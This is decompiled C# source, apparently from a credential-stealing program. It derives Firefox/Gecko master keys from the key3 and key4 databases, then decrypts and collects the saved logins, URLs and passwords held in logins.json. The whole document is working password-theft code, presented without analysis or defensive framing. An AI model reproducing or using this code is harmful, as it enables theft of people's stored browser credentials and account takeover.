// Token: 0x0600009E RID: 158 RVA: 0x00006C8C File Offset: 0x00004E8C private byte[] ExtractPrivateKey3(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } new DataTable(); GeckoDatabase geckoDatabase = new GeckoDatabase(file); GeckoDatabase arg_45_1 = geckoDatabase; Func <string, bool> arg_45_2; if ((arg_45_2 = GeckoManager.< > c.< > 9__5_0) == null) { arg_45_2 = (GeckoManager.< > c.< > 9__5_0 = new Func <string, bool>(GeckoManager.< > c.< > 9. < ExtractPrivateKey3 > b__5_0)); } DataParser dataParser = new DataParser(this.FindValueByKey(arg_45_1, arg_45_2)); GeckoDatabase arg_71_1 = geckoDatabase; Func <string, bool> arg_71_2; if ((arg_71_2 = GeckoManager.< > c.< > 9__5_1) == null) { arg_71_2 = (GeckoManager.< > c.< > 9__5_1 = new Func <string, bool>(GeckoManager.< > c.< > 9. < ExtractPrivateKey3 > b__5_1)); } string expr_76 = this.FindValueByKey(arg_71_1, arg_71_2); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(RecoveryHelper.ConvertHexStringToByteArray(expr_76), Encoding.Default.GetBytes(string.Empty), RecoveryHelper.ConvertHexStringToByteArray(dataParser.EntrySalt)); geckoPasswordBasedEncryption.Calculate(); CrytoServiceProvider.Decode(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, RecoveryHelper.ConvertHexStringToByteArray(dataParser.Passwordcheck), PaddingMode.None); GeckoDatabase arg_E5_1 = geckoDatabase; Func <string, bool> arg_E5_2; if ((arg_E5_2 = GeckoManager.< > c.< > 9__5_2) == null) { arg_E5_2 = (GeckoManager.< > c.< > 9__5_2 = new Func <string, bool>(GeckoManager.< > c.< > 9. < ExtractPrivateKey3 > b__5_2)); } Asn1Object asn1Object = Asn1Factory.Create(RecoveryHelper.ConvertHexStringToByteArray(this.FindValueByKey(arg_E5_1, arg_E5_2))); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(RecoveryHelper.ConvertHexStringToByteArray(expr_76), Encoding.Default.GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); geckoPasswordBasedEncryption2.Calculate(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(CrytoServiceProvider.Decode(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24) { Array.Copy(asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24); } else { array = asn1Object2.Objects[0].Objects[3].ObjectData; } } catch (Exception) { } return(array); }
// Token: 0x0600009D RID: 157 RVA: 0x00006A64 File Offset: 0x00004C64 private byte[] ExtractPrivateKey4(string file) { byte[] result = new byte[24]; try { if (!File.Exists(file)) { return(result); } SqlConnection sqlConnection = new SqlConnection(file); sqlConnection.ReadTable("metaData"); string value = sqlConnection.GetValue(0, "item1"); string value2 = sqlConnection.GetValue(0, "item2)"); Asn1Object expr_56 = Asn1Factory.Create(Encoding.Default.GetBytes(value2)); byte[] objectData = expr_56.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData; byte[] objectData2 = expr_56.Objects[0].Objects[1].ObjectData; GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), objectData); geckoPasswordBasedEncryption.Calculate(); CrytoServiceProvider.Decode(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, objectData2, PaddingMode.None); sqlConnection.ReadTable("nssPrivate"); int rowCount = sqlConnection.GetRowCount(); string s = string.Empty; for (int i = 0; i < rowCount; i++) { if (sqlConnection.GetValue(i, "a102") == Encoding.Default.GetString(ConstantStorage.Key4MagicNumber)) { s = sqlConnection.GetValue(i, "a11"); IL_148: Asn1Object expr_159 = Asn1Factory.Create(Encoding.Default.GetBytes(s)); objectData = expr_159.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData; objectData2 = expr_159.Objects[0].Objects[1].ObjectData; geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), objectData); geckoPasswordBasedEncryption.Calculate(); result = Encoding.Default.GetBytes(CrytoServiceProvider.Decode(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, objectData2, PaddingMode.PKCS7)); return(result); } } goto IL_148; } catch (Exception) { } return(result); }
// Token: 0x0600009C RID: 156 RVA: 0x00006864 File Offset: 0x00004A64 public List <BrowserCredendtial> GetLogins(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = RecoveryHelper.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } GeckoLogin[] logins = File.ReadAllText(path).FromJSON <GeckoRootEntry>().logins; for (int i = 0; i < logins.Length; i++) { GeckoLogin geckoLogin = logins[i]; Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedUsername)); Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedPassword)); string text = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(geckoLogin.hostname) ? "UNKNOWN" : geckoLogin.hostname), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception) { } return(list); }